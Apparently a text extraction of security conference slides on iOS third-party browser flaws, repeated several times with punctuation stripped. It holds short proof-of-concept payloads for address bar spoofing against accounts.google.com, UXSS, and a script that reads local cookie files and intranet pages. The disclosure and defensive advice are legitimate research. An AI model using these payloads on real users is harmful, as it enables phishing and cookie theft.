mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 10: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/10.jpg)
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 11: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/11.jpg)
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
